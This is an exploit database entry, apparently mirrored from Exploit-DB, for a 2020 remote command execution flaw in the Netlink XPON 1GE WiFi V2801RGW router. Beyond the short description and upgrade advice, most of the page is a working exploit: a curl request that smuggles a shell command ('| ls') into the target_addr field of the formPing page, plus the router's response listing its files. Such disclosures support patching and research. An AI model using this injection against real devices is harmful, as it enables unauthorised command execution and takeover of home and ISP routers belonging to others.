header-logo
Suggest Exploit
vendor:
Netlink XPON 1GE WiFi V2801RGW
by:
Seecko Das
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Netlink XPON 1GE WiFi V2801RGW
Affected Version From: V3.3.0-190627
Affected Version To: V3.3.0-190627
Patch Exists: YES
Related CWE: N/A
CPE: h:crtindia:netlink_xpon_1ge_wifi_v2801rgw
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10/Linux (Kali)
2020

Netlink XPON 1GE WiFi V2801RGW – Remote Command Execution

A vulnerability in Netlink XPON 1GE WiFi V2801RGW allows an attacker to execute arbitrary commands on the device by sending a specially crafted HTTP request. The vulnerability exists due to insufficient validation of user-supplied input in the target_addr parameter of the /boaform/admin/formPing page. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable device. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the vulnerable device.

Mitigation:

Upgrade to the latest version of Netlink XPON 1GE WiFi V2801RGW.
Source

Exploit-DB raw data:

# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
# Google Dork: Not applicable
# Date: 2020-05-13
# Exploit Author: Seecko Das
# Vendor Homepage: https://www.crtindia.com/
# Version: V3.3.0-190627
# Tested on: Windows 10/Linux (Kali)
# CVE: N/A

Exploit :

curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing
 

Response :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--ϵͳĬ��ģ��-->
<html>
<head>
<title>PING���Խ��</title>
<meta http-equiv=pragma content=no-cache>
<meta http-equiv=refresh content="2">
<meta http-equiv=cache-control content="no-cache, must-revalidate">
<meta http-equiv=content-type content="text/html; charset=gbk">
<meta http-equiv=content-script-type content=text/javascript>
<!--ϵͳ����css-->
<style type=text/css>
@import url(/style/default.css);
</style>
<!--ϵͳ�����ű�-->
<script language="javascript" src="common.js"></script>
</head>
<!-------------------------------------------------------------------------------------->
<!--��ҳ����-->
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000">
 <blockquote>
 <form>
 <div align="left" style="padding-left:20px;"><br>
	<div align="left"><b>Please wait</b>
	<br><br>
	</div>
	<pre>
boa.conf
web
	</pre>

 <input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")>
 </div>
 </form>
 </blockquote>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR